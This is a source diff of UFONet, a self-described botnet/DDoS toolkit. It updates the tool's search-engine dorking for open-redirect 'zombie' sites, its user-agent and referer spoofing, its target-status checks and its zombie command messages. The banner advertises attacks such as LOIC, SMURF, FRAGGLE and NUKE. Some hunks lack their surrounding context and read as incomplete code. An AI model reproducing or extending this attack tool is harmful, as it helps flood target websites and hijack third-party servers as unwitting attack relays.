@@ -3,7 +3,7 @@
This file is part of the UFONet project, https://ufonet.03c8.net
-Copyright (c) 2013/2022 | psy <epsylon@riseup.net>
+Copyright (c) 2013/2024 | psy <epsylon@riseup.net>
You should have received a copy of the GNU General Public License along
with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -11,8 +11,13 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os, sys, re, traceback, random, time, threading, base64, string, math
import io, socket, ssl, cgi, json, gzip
-from Crypto.Cipher import AES
from hashlib import sha1, sha256
+ from Cryptodome.Cipher import AES
+ print ("\n[Error] Something wrong with -crypto- libs... Aborting!\n")
+ sys.exit()
from urllib.parse import urlparse as urlparse
@@ -60,12 +65,12 @@ class UFONet(object):
self.GIT_REPOSITORY = 'https://code.03c8.net/epsylon/ufonet' # oficial code source [OK! 22/12/2018]
self.GIT_REPOSITORY2 = 'https://github.com/epsylon/ufonet' # mirror source [since: 04/06/2018]
self.github_zombies = 'https://raw.githubusercontent.com/epsylon/ufonet/master/botnet/' # default [RAW] download/upload zombies [Blackhole] [GitHub] [DIY]
- self.external_check_service1 = 'https://www.isitdownrightnow.com/' # set external check service 1 [OK! 23/07/2022]
- self.external_check_service2 = 'https://downforeveryoneorjustme.com/' # set external check service 2 [OK! 23/07/2022]
- self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site [OK! 23/07/2022]
- self.check_ip_service1 = 'https://checkip.org/' # set external check ip service 1 [OK! 23/07/2022]
- self.check_ip_service2 = 'https://whatismyip.org/' # set external check ip service 2 [OK! 06/06/2020]
- self.check_ip_service3 = 'https://ip.42.pl/ra' # set external check ip service 3 [OK! [23/07/2022]
+ self.external_check_service1 = 'https://www.isitdownrightnow.com/check.php?domain=' # set external check service 1 [OK! 20/08/2024]
+ self.external_check_service2 = 'https://isitdownorjustme.net/status/' # set external check service 2 [OK! 23/07/2022]
+ self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site [OK! 23/07/2022] [OK! 25/08/2024]
+ self.check_ip_service2 = 'https://checkip.org/' # set external check ip service 1 [OK! 23/07/2022] [OK! 25/08/2024]
+ self.check_ip_service1 = 'https://ip.42.pl/ra' # set external check ip service 2 [OK! [23/07/2022] [OK! 25/08/2024]
+ #self.check_ip_service3 = 'https://whatismyip.org/' # set external check ip service 2 [OK! 06/06/2020] [OK! 25/08/2024]
self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
self.motherships_file = 'core/txt/motherships.txt' # set source path to retrieve mothership names
self.zombies_file = 'botnet/zombies.txt' # set source path to retrieve [Zombies]
@@ -212,29 +217,29 @@ class UFONet(object):
return self.options
def banner_welcome(self):
- print(" ____ ")
- print(" || / /\ \ || #===============================================#")
- print(" -(00)- + (XX) + -(00)- || ||")
- print(" || || O ==*~~~~~~*== 0 || || || > Botnet [DDoS] # > Close Combat [DoS] ||")
- print(" -(00)- (0) XX (0) -(00)- || ||")
- print(" || _ _ \| (00) |/ _ _ || || |-> ZOMBIES # |-> LOIC ||")
- print(" (O)_ (O) 0'----'0 (O) _(O) || |-> DROIDS # |-> LORIS ||")
- print(" | |.''.( xx ).''.| | || |-> ALIENS # |-> UFOSYN ||")
- print(" .'.' +X|'..'|X+ '.'. || |-> UCAVs # |-> XMAS ||")
- print(" .-. .' /'--.__|_00_|__.--'\ '. .-. || |-> X-RPCs # |-> NUKE ||")
- print(" +(O).)-|0| \ x| ## |x / |0|-(.(O)+ || |-> DBSTRESS # |-> UFOACK ||")
- print(" `-' '-'-._'-./ -00- \.-'_.-'-' `-' || |-> SPRAY # |-> UFORST ||")
- print(" _ | || '-.___||___.-' || | _ || |-> SMURF # |-> DROPER ||")
- print(" .' _ | ||==O | __ | O==|| | _ '. || |-> TACHYON # |-> OVERLAP ||")
- print(" / .' ''.| || | /_00_\ | || |.'' '. \ || |-> MONLIST # |-> PINGER ||")
- print(" _ | '### | =| | ###### | |= |' ### | _ || |-> FRAGGLE # |-> UFOUDP ||")
- print("(0)-| |(0)| '. 0\||__**_ ||/0 .' |(0)| |-(0) || |-> SNIPER # ||")
- print(" * \ '._.' '. | \_##_/ | .' '._.' / * || ||")
- print(" '.__ ____0_'.|__'--'__|.'_0____ __.' #|=============================================|#")
- print(" .'_.-| YY |-._'. || ||")
- print(" || -> [ UFONet: https://ufonet.03c8.net ] <- ||")
- print(" + Class: PSYoPs / "+str(self.mothership_model)+" + || ||")
- print(" #|=============================================|#")
+ print(r" ____ ")
+ print(r" || / /\ \ || #===============================================#")
+ print(r" -(00)- + (XX) + -(00)- || ||")
+ print(r" || || O ==*~~~~~~*== 0 || || || > Botnet [DDoS] # > Close Combat [DoS] ||")
+ print(r" -(00)- O|O (0) XX (0) -(00)- || ||")
+ print(r" || _____ |____\| (00) |/______|D___ || || |-> ZOMBIES # |-> LOIC ||")
+ print(r" O+!$(O)! (O) 0'----'0 (O) !(O)$!+O || |-> DROIDS # |-> LORIS ||")
+ print(r" |OO OO| .''.( xx ).''. |OO OO| || |-> ALIENS # |-> UFOSYN ||")
+ print(r" **+***.'.' +X|'..'|X+ '.'***+**. || |-> UCAVs # |-> XMAS ||")
+ print(r" .-. .' /'--.__|_00_|__.--'\ '. .-. || |-> X-RPCs # |-> NUKE ||")
+ print(r" +(O).)-|0| \ x| ## |x / |0|-(.(O)+ || |-> DBSTRESS # |-> UFOACK ||")
+ print(r" `-' '-'-._'-./ -00- \.-'_.-'-' `-' || |-> SPRAY # |-> UFORST ||")
+ print(r" _ | || '-.___||___.-' || | _ || |-> SMURF # |-> DROPER ||")
+ print(r" .' _ | ||==O | __ | O==|| | _ '. || |-> TACHYON # |-> OVERLAP ||")
+ print(r" / .' ''.| || | /_00_\ | || |.'' '. \ || |-> MONLIST # |-> PINGER ||")
+ print(r" _ | '### | =| | ###### | |= |' ### | _ || |-> FRAGGLE # |-> UFOUDP ||")
+ print(r"(0)-| |(0)| '. 0\||__**_ ||/0 .' |(0)| |-(0) || |-> SNIPER # ||")
+ print(r" * \ '._.' '. | \_##_/ | .' '._.' / * || ||")
+ print(r" '.__ ____0_'.|__'--'__|.'_0____ __.' #|=============================================|#")
+ print(r" .'_.-| YY |-._'. || ||")
+ print(r" || -> [ UFONet: https://ufonet.03c8.net ] <- ||")
+ print(r" + Class: PSYoPs / "+str(self.mothership_model)+" + || ||")
+ print(r" #|=============================================|#")
def banner(self):
@@ -298,15 +303,14 @@ class UFONet(object):
private_ip = "Unknown"
- public_ip = requests.get(self.check_ip_service3).text
+ public_ip = requests.get(self.check_ip_service1).text
+ public_ip = re.compile(r'(\d+\.\d+\.\d+\.\d+)').search(public_ip).group(1)
public_ip = requests.get(self.check_ip_service2).text
+ public_ip = re.compile(r'(\d+\.\d+\.\d+\.\d+)').search(public_ip).group(1)
- try:
- public_ip = requests.get(self.check_ip_service1).text
- except:
- public_ip = "Unknown"
+ public_ip = "Unknown"
return private_ip, public_ip
def try_running(self, func, error, args=None):
@@ -337,9 +341,9 @@ class UFONet(object):
self.user_agent = random.choice(self.agents).strip()
self.search_engines = [] # available dorking search engines
- self.search_engines.append('bing') # [13/07/2021: OK!]
- self.search_engines.append('yahoo') # [13/07/2021: OK!]
- self.search_engines.append('duck') # [13/07/2021: OK!]
+ self.search_engines.append('bing') # [13/07/2021: OK!] [25/08/2024 OK!]
+ #self.search_engines.append('yahoo') # [13/07/2021: OK!] [25/08/2024: tracking remote url origin]
+ self.search_engines.append('duck') # [13/07/2021: OK!] [25/08/2024 OK!]
#self.search_engines.append('startpage') # [01/02/2020: deprecated! -> blocking instream params search]
#self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound]
#self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR]
@@ -421,7 +425,7 @@ class UFONet(object):
proxy = options.proxy
if options.proxy:
- pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
+ pattern = r'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
m = re.search(pattern, proxy)
if m is None:
@@ -461,25 +465,25 @@ class UFONet(object):
if options.cryptomsg:
from core.tools.crypter import Cipher
print(" " + '='*44)
- print(" ")
- print(" ____...------------...____ ")
- print(" _.-'' /o/__ ____ __ __ __ \o\_`'-._ ")
- print(" .' / / \ \ '. ")
- print(" |=====/o/======================\o\=====| ")
- print(" |____/_/________..____..________\_\____| ")
- print(" / _/ \_ <_o#\__/#o_> _/ \_ \ ")
- print(" \__/_____\####/0213411543/####/_____\__/ ")
- print(" |===\!/========================\!/===| ")
- print(" | |=| .---. |=| | ")
- print(" |===|o|=========/ \========|o|===| ")
- print(" | | | \() ()/ | | | ")
- print(" |===|o|======{'-.) A (.-'}=====|o|===| ")
- print(" | __/ \__ '-.\\uuu/.-' __/ \__ | ")
- print(" |==== .'.'^'.'.====|====.'.'^'.'.====| ")
- print(" | _\o/ __ {.' __ '.} _ _\o/ _| ")
- print(" '''''''''''''''''''''''''''''''''''''' ")
- print("\n + UFONet Crypter (AES256+HMAC-SHA1)")
- print(" (140 plain text chars = 69 encrypted chars)\n")
+ print(r" ")
+ print(r" ____...------------...____ ")
+ print(r" _.-'' /o/__ ____ __ __ __ \o\_`'-._ ")
+ print(r" .' / / \ \ '. ")
+ print(r" |=====/o/======================\o\=====| ")
+ print(r" |____/_/________..____..________\_\____| ")
+ print(r" / _/ \_ <_o#\__/#o_> _/ \_ \ ")
+ print(r" \__/_____\####/0213411543/####/_____\__/ ")
+ print(r" |===\!/========================\!/===| ")
+ print(r" | |=| .---. |=| | ")
+ print(r" |===|o|=========/ \========|o|===| ")
+ print(r" | | | \() ()/ | | | ")
+ print(r" |===|o|======{'-.) A (.-'}=====|o|===| ")
+ print(r" | __/ \__ '-.\\uuu/.-' __/ \__ | ")
+ print(r" |==== .'.'^'.'.====|====.'.'^'.'.====| ")
+ print(r" | _\o/ __ {.' __ '.} _ _\o/ _| ")
+ print(r" '''''''''''''''''''''''''''''''''''''' ")
+ print(r" + UFONet Crypter (AES256+HMAC-SHA1)")
+ print(r" (140 plain text chars = 69 encrypted chars)")
print(" " + '='*44 + "\n")
text = str(input("-> Enter TEXT: "))
input_key = str(input("\n-> Enter KEY: "))
@@ -507,7 +511,9 @@ class UFONet(object):
private_ip, public_ip = self.show_ips()
print("|- IP Private :", private_ip)
print("|" +"-"*34)
- t = urlparse(self.check_ip_service3)
+ self.check_ip_services = [self.check_ip_service1, self.check_ip_service2] # shuffle check ip services
+ self.check_ip_service = random.choice(self.check_ip_services).strip() # shuffle user-agent
+ t = urlparse(self.check_ip_service)
name_service = t.netloc
print("|- IP Public :", public_ip +" | ["+name_service+"]")
@@ -3827,69 +3833,24 @@ class UFONet(object):
url = url + data
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
- if options.verbose:
- print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
- try:
- if options.proxy: # set proxy
- self.proxy_transport(options.proxy)
- req = urllib.request.Request(url, None, headers)
- req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
- except:
- print('[Error] [AI] Unable to connect to: bing\n')
- if options.allengines or options.autosearch:
- return
- if not options.dorks or not options.autosearch:
- if not self.options.forceyes:
- update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
- else:
- update_reply = "Y"
- if update_reply == "n" or update_reply == "N":
- return #sys.exit(2)
- print("\nSearch engines available:")
- print('-'*25)
- for e in self.search_engines:
- print("+ "+e)
- print('-'*25)
- print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
- return #sys.exit(2)
- else:
- req_reply = ''
- regex = '<li class="b_algo"><h2><a href="(.+?)">' # regex magics
- pattern = re.compile(regex)
- url_links = re.findall(pattern, req_reply)
- elif options.engine == 'yahoo': # yahoo [28/02/2019: OK!]
- location = ['fr', 'de', 'es', 'nl', 'it', 'se', 'ch', 'jp', 'ru', 'lt'] # evading Yahoo anti-dorking [grey magic: 28/02/2019]
- #location = ['fr', 'de', 'es', 'nl', 'se', 'ch', 'ru'] # [08/04/2017]
- location = str(random.choice(location).strip()) # shuffle location
- if location == "jp": # [28/02/2019]
- url = 'https://search.yahoo.co.jp/search?'
+ if options.num_results: # set number of results to search
+ try:
+ num_results = int(options.num_results)
+ except:
+ print("[Info] [AI] You should specify an integer!... Using default value: 10\n")
+ num_results = 10
- url = 'https://'+location+'.search.yahoo.com/search?'
- if options.search: # search from query
- if location == "jp":
- q = '"' + str(options.search) + '"' # set query to search literally on results
- else:
- q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
- if options.dorks or options.autosearch: # search from a dork
- if location == "jp":
- q = '"' + str(dork) + '"' # set query to search literally on results
- else:
- q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
- start = 0 # set index number of first entry
- query_string = { 'p':q, 'b':start }
- data = urllib.parse.urlencode(query_string)
- url = url + data
- self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
- headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
+ num_results = 10
if options.verbose:
- print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
+ print("[Info] [AI] [DORKING] Query used: " + url + " (POST: "+ data + ")")
+ print("[Info] [AI] [DORKING] Max results: " +str(num_results)+"\n")
if options.proxy: # set proxy
req = urllib.request.Request(url, None, headers)
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
- print('[Error] [AI] Unable to connect to: yahoo\n')
+ print('[Error] [AI] Unable to connect to: bing\n')
if options.allengines or options.autosearch:
if not options.dorks or not options.autosearch:
@@ -3904,15 +3865,69 @@ class UFONet(object):
for e in self.search_engines:
print("+ "+e)
- print("\nEx: ufonet -s 'proxy.php?url=' --se 'bing'")
+ print("\nEx: ufonet -s 'page.php?url=' --se 'bing'")
return #sys.exit(2)
req_reply = ''
- #regex = '<h3 class="title"><a style="color:#2C46C7" class=" td-u" href="(.+?)" target="_blank"' # regex magics [18/08/2016]
- regex = 'href="(.+?)" target="_blank" data' # regex magics [08/04/2017]
+ regex = '</a></div><h2><a href="(.+?)">' # regex magics [25/08/2024 OK!]
pattern = re.compile(regex)
url_links = re.findall(pattern, req_reply)
- elif options.engine == 'duck': # using duckduckgo [28/02/2019: OK!]
+ #elif options.engine == 'yahoo': # yahoo [28/02/2019: OK!]
+ # location = ['fr', 'de', 'es', 'nl', 'it', 'se', 'ch', 'jp', 'ru', 'lt'] # evading Yahoo anti-dorking [grey magic: 28/02/2019]
+ # #location = ['fr', 'de', 'es', 'nl', 'se', 'ch', 'ru'] # [08/04/2017]
+ # location = str(random.choice(location).strip()) # shuffle location
+ # if location == "jp": # [28/02/2019]
+ # url = 'https://search.yahoo.co.jp/search?'
+ # else:
+ # url = 'https://'+location+'.search.yahoo.com/search?'
+ # if options.search: # search from query
+ # if location == "jp":
+ # q = '"' + str(options.search) + '"' # set query to search literally on results
+ # else:
+ # q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
+ # if options.dorks or options.autosearch: # search from a dork
+ # if location == "jp":
+ # q = '"' + str(dork) + '"' # set query to search literally on results
+ # else:
+ # q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
+ # start = 0 # set index number of first entry
+ # query_string = { 'p':q, 'b':start }
+ # data = urllib.parse.urlencode(query_string)
+ # url = url + data
+ # self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
+ # headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
+ # if options.verbose:
+ # print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
+ # try:
+ # if options.proxy: # set proxy
+ # self.proxy_transport(options.proxy)
+ # req = urllib.request.Request(url, None, headers)
+ # req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
+ # except:
+ # print('[Error] [AI] Unable to connect to: yahoo\n')
+ # if options.allengines or options.autosearch:
+ # return
+ # if not options.dorks or not options.autosearch:
+ # if not self.options.forceyes:
+ # update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
+ # else:
+ # update_reply = "Y"
+ # if update_reply == "n" or update_reply == "N":
+ # return #sys.exit(2)
+ # print("\nSearch engines available:")
+ # print('-'*25)
+ # for e in self.search_engines:
+ # print("+ "+e)
+ # print('-'*25)
+ # print("\nEx: ufonet -s 'page.php?url=' --se 'bing'")
+ # return #sys.exit(2)
+ # else:
+ # req_reply = ''
+ # #regex = '<h3 class="title"><a style="color:#2C46C7" class=" td-u" href="(.+?)" target="_blank"' # regex magics [18/08/2016]
+ # regex = 'href="(.+?)" target="_blank" data' # regex magics [08/04/2017]
+ # pattern = re.compile(regex)
+ # url_links = re.findall(pattern, req_reply)
+ elif options.engine == 'duck': # using duckduckgo [28/02/2019: OK!] [25/08/2024 OK!]
url = 'https://duckduckgo.com/html/'
if options.search: # search from query
q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
@@ -3920,15 +3935,22 @@ class UFONet(object):
q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
query_string = { 'q':q }
data = urllib.parse.urlencode(query_string)
- self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
- headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
+ from duckduckgo_search import DDGS # import search engine wrapper lib
+ if options.num_results: # set number of results to search
+ try:
+ num_results = int(options.num_results)
+ except:
+ print("[Info] [AI] You should specify an integer!... Using default value: 10\n")
+ num_results = 10
+ else:
+ num_results = 10
if options.verbose:
- print("[Info] [AI] [DORKING] Query used: " + url + " (POST: "+ data + ")\n")
+ print("[Info] [AI] [DORKING] Query used: " + url + " (POST: "+ data + ")")
+ print("[Info] [AI] [DORKING] Max results: " +str(num_results)+"\n")
if options.proxy: # set proxy
- req = urllib.request.Request(url, data.encode('utf-8'), headers) # HTTP POST request
- req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
+ req_reply = DDGS().text(data, safesearch='Off', max_results=num_results)
print('[Error] [AI] Unable to connect to: duck\n')
if options.allengines or options.autosearch:
@@ -3945,13 +3967,15 @@ class UFONet(object):
for e in self.search_engines:
print("+ "+e)
- print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
+ print("\nEx: ufonet -s 'page.php?url=' --se 'bing'")
return #sys.exit(2)
req_reply = ''
- regex = 'snippet" href="(.+?)">' # regex magics
- pattern = re.compile(regex)
- url_links = re.findall(pattern, req_reply)
+ url_links = []
+ for url_reply in req_reply:
+ for key,value in url_reply.items():
+ if key == "href":
+ url_links.append(value)
else: # no valid search engine
print('[Error] [AI] This search engine is not supported!\n')
if not options.dorks or options.autosearch:
@@ -3966,7 +3990,7 @@ class UFONet(object):
for e in self.search_engines:
print("+ "+e)
- print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
+ print("\nEx: ufonet -s 'page.php?url=' --se 'bing'")
return #sys.exit(2)
req_reply = ''
@@ -3985,11 +4009,11 @@ class UFONet(object):
if options.engine == "bing":
if " h=" in url: # regex magics [18/08/2016]
url = url.rsplit('" h=',1)[0]
- if options.engine == "yahoo":
- if 'RU=' in url: # regex magics [18/08/2016]
- url = url.rsplit('RU=',1)[1]
- if 'UTF-8&u=' in url: # regex magics [05/02/2018]
- url = url.rsplit('UTF-8&u=',1)[1]
+ #if options.engine == "yahoo":
+ # if 'RU=' in url: # regex magics [18/08/2016]
+ # url = url.rsplit('RU=',1)[1]
+ # if 'UTF-8&u=' in url: # regex magics [05/02/2018]
+ # url = url.rsplit('UTF-8&u=',1)[1]
total_results = total_results + 1 # results counter
url_link = urllib.parse.unquote(url) # unquote encoding
if options.search:
@@ -4415,7 +4439,10 @@ class UFONet(object):
param = re.findall(pattern_param, alien) # HTTP POST params to submit
for u in alien_url:
url = u # ex: POST -> path/submit.php
- t = urlparse(url)
+ try:
+ t = urlparse(url)
+ except:
+ pass
name_alien = t.netloc
if name_alien == "":
name_alien = alien
@@ -5215,6 +5242,8 @@ class UFONet(object):
return disc_zombies
def parse_url_encoding(self, target):
+ if not target.startswith("http"):
+ target = "http://" + target
t = urlparse(target)
host = urllib.parse.quote(t.netloc.encode('utf-8'))
path = urllib.parse.quote(t.path.encode('utf-8'))
@@ -5408,7 +5437,7 @@ class UFONet(object):
self.payload = False
if "https://www.whitehouse.gov" in payload_reply: #Open Redirect reply [requested by all UFONet motherships ;-)]
num_waiting_zombies = num_waiting_zombies + 1
- print("Status:", "Waiting for orders... ;-)")
+ print("Status:", "Awaiting for orders... ;-)")
num_disconnected_zombies = num_disconnected_zombies + 1
@@ -5510,7 +5539,7 @@ class UFONet(object):
# send Open Redirect injection (multiple zombies > one target url)
reply = self.injection(target, zombies)
- print("\n[Error] [AI] Target not valid: "+target+" -> [Discarding!]\n")
+ print("\n[Error] [AI] Target not valid (add protocol prefix http(s)://): "+target+" -> [Discarding!]\n")
def aiming_extra_weapons(self, target, proxy, loic, loris, ufosyn, spray, smurf, fraggle, xmas, ufoack, uforst, droper, overlap, pinger, ufoudp, nuke, tachyon, monlist, sniper):
# perform some other extra attacks (such as DoS techniques)
@@ -5865,7 +5894,7 @@ class UFONet(object):
target = target.replace("https://", "")
- url = self.external_check_service1 + target + ".html" # check from external service [1] [23/07/2022]
+ url = self.external_check_service1 + target # check from external service [1] [23/07/2022]
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.proxy: # set proxy
@@ -5886,7 +5915,7 @@ class UFONet(object):
req = urllib.request.Request(url, None, headers)
req_reply = urllib.request.urlopen(req, context=self.ctx).read()
- if b"It's just you" in req_reply:
+ if b"Currently Up" in req_reply:
t = urlparse(self.external_check_service2)
name_external2 = t.netloc
print("[Info] [AI] [Control] From OTHERS: YES -> ["+name_external2+"]")